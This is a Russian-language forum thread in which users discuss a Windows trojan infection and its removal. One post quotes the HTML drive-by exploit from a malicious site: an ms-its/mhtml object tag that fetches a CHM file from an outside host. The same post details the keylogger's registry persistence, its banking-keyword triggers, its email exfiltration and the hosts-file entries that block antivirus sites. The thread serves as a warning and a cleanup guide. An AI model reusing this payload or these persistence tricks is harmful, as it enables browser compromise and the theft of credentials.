Неизвестный вирус.

[Korvin]

Я столкнулся со странным вирусом.

Опишу его действие.

Возникает файл win_nt.exe

При включении и через определённые интервалы времени он запускается, но Dr.Watson пишет, что возникла ошибка.

Когда я его удаляю, он возникает снова (при перезагрузке).

Регистр я просмотрел (и сам и с помошью Ad-Aware Professional).

Антивирусы не помогают (NORTON не работает(не может даже начать сканирование), а AntivirXP ничего не находит).

Плюс ко всему постоянно лезет сайт GIGASEARH, и ещё один полупорнушный сайт.

Меняю стартовую страницу но это не помогает.

Пробовал менять её в реестре - тот же результат восстанавливается старая(http://max-stats.com/).

При помощи Ad-Watch я всё это заблокировал(сайт не загружается), но в реестре всё равно прписан этот адрес (http://max-stats.com/).

Если кто знает, подскажите плиз.

На компе WinNT/

[Gеneral]

подвесь свой хард на чистую машину, с обновленными базами антивируса и проскань его там. с реестра его поудаляй. :)

[Desdichado]

Малость не по теме, но предупредить ВСЕХ ВАС хочу:

Появилась новая угроза Вашей безопасности!

Опасность заключается в ссылке на сайт с информацией о переводах всем известного Гоблина.

НЕ В КОЕМ СЛУЧАЕ НЕ ЗАХОДИТЬ ПО ССЫЛКЕ!

htp://goblinperevod.com (ошибка в адрессе допущена специально, чтобы защитить тех, кто в осадном, и все-таки хочет проверить действие сайта на себе.)

С виду совсем безобидный сайт, РВСом и близко не пахнет. Я на него не обратил никакого внимания, до тех пор, пока не увидел в папке "C:\windows\temp" файл с логом своих клавиатурных нажатий и содержанием буффера обмена. Кроме того в файле была вся информация о системе. Все это должно было отослаться злоумышленику. В файле присутсвовала вышеописуемая ссылка. Мне стало понятно, что я подцепил вирус, который нужно немедленно удалить...

Каким образом вирус попадает на компьютер? Посредством вот этих строчек на в html-коде странички:

<textarea id="code" style="display: none;"><object

data="ms-its:mhtml:file://C:\\MAIN.MHT!http://goblinperevod.c om/ma in1.chm::/main1.html"

type="text/x-scriptlet" height=1 width=1></object>

</textarea>

<script language="javascript">

document.write(code.value.replace(/\${PATH}/g,location.href.substring( 0,loc ation.href.indexOf('index.html'))));

</script>

Не буду объяснять что это означает, кто в этом разбирается, тот поймет. Просто знайте, что если у вас браузер IE и вы открыли эту ссылку, то на вашем компьютере уже есть вирус.

ЧТО ДЕЛАЕТ ВИРУС:

- копирует сам себя этими фалами

- системная папка на вашем компьютере. C:\windows\system на компьютерах с системой Windows 95/98/Me и C:\Windows\System32 на компьютерах с системой Windows XP

- папка автозагрузки для Windows 95/98/Me - C:\Windows\Главное меню\Программы\Автозагрузка Для Windows XP C:\Documents and Settings\имя пользователя\Главное меню\Программы\Автозагрузка

- создает несколько вредоносных файлов

и добавляет значение в ключе реестра HKEY_LOCAL_MACHINE

что позволяет загружаться вирусу в память при загрузке Windows

- создает и загружает .dll файл, который перехватывает клавиатурные нажатия. У меня это был prntsvr.dll

- изменяет значение Shell

в ключе реестра HKEY_LOCAL_MACHINENTс "explorer.exe" на "explorer.exe %System%\netdc.exe" , что также позволяет вирусу запускаться при загрузке Windows 95/98/Me.

- следит за окнами которые вы открываете. Если в нем содержаться слова подобные этим:

Bank bank bull Bull cash ebay ePass Fethard fethard Fidelity gold iKobo mull PayPal storm webmoney WM Keeper

+формы для авторизации, то вирус перехватывает клавиатурные нажатия и записывает их в лог-файл %Windir%\TEMP\fe43e701.htm

- запускает процесс, который перехватывает данные из буфера обмена и записывает их в лог-файл %Windir%\TEMP\feff35a0.htm

- переодически проверяет размер лог-файлов и, если они содержат достаточное к-во информации, отсылает на хорошо зашифрованые имейл адресса

- добавляет следуйщие строки в файл %System%\Drivers\Etc\Hosts

127.0.0.1 avp.com

127.0.0.1 ca.com

127.0.0.1 customer.symantec.com

127.0.0.1 dispatch.mcafee.com

127.0.0.1 download.mcafee.com

127.0.0.1 f-secure.com

127.0.0.1 kaspersky.com

127.0.0.1 liveupdate.symantec.com

127.0.0.1 liveupdate.symantecliveupdate.com

127.0.0.1 mast.mcafee.com

127.0.0.1 mcafee.com

127.0.0.1 my-etrust.com

127.0.0.1 nai.com

127.0.0.1 networkassociates.com

127.0.0.1 rads.mcafee.com

127.0.0.1 secure.nai.com

127.0.0.1 securityresponse.symantec.com

127.0.0.1 sophos.com

127.0.0.1 symantec.com

127.0.0.1 trendmicro.com

127.0.0.1 update.symantec.com

127.0.0.1 updates.symantec.com

127.0.0.1 us.mcafee.com

127.0.0.1 viruslist.com

127.0.0.1 www.avp.com

127.0.0.1 www.ca.com

127.0.0.1 www.f-secure.com

127.0.0.1 www.kaspersky.com

127.0.0.1 www.mcafee.com

127.0.0.1 www.my-etrust.com

127.0.0.1 www.nai.com

127.0.0.1 www.networkassociates.com

127.0.0.1 www.sophos.com

127.0.0.1 www.symantec.com

127.0.0.1 www.trendmicro.com

127.0.0.1 www.viruslist.com

это приводит к тому, что вы не сможете зайти на сайты, указаные выше(это сайты ведущих антивирусных компаний).

Из всего этого следует, что имея на компьютере этот вирус, вся ваша конфидициальная информация может попасть в руки злоумышленика, что для некоторых фатально и грозит потерей денег на банковских счетах и т.п.

Как определить есть ли у вас этот вирус: следует просто-напросто посмотреть наличие вышеописуемых изменений в вашей системе. Например я у себя в папке "Автозгрузка" увидел файл "netdc.exe". Посмотреть содержимое папки "Автозагрузка" можно нажав кнопку "Пуск" далее "Программы", там и найдете эту папку.

Как избавится от вируса:

1. Нужно исправить ключи реестра, которые модифицировал вирус:

-нажимаем Пуск->Выполнить, вводим regedit(тем самым запускаем редактор реестра), находим в открывшемся окне следуйщий ключ:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

в правой панели удаляем значение "load32"="%System%\netda.exe..."

-находим ключ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

в правой панели меням значение Shell с "explorer.exe %System%\netdc.exe" на "explorer.exe"

-закрываем редактор реестра

2. нажимаем Пуск->Выполнить, вводим msconfig. в открывшемся окне нажимаем на вкладку "Автозагрузка"и снимаем с автозагрузки файл netdb.exe

3. Ищем и удаляем с жесткого диска файлы

netda.exe

netdb.exe

netdc.exe

4. Находим на диске файл hosts и открываем его блокнотом, удаляем все строки кроме 127.0.0.1 localhost

Вот и все.

Прочитав все это, сделайте правильные выводы, относитесь серьёзно к безопасности, не заходите по незнакомым ссылкам, даже если они кажутся безобидными и вполне нормальными.

Обезательно установите антивирус, если у вас его до сих пор нету(таких людей много). Если антивирус есть, то почаще обновляйте антивирусные базы.

Как видите - опасность может исходить откуда ее совсем не ждут. Берегите себя.

[Stolik]

Так нефиг IE юзать...

[alexandre72]

люди помогите(( подцепил трояна под ником Trojan-Downloader.JS.IstBar.d

расскажите плиз как его убить?